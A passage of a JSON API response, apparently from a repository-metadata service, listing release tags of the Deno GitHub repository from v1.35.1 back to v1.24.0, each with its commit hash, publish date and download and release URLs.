07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0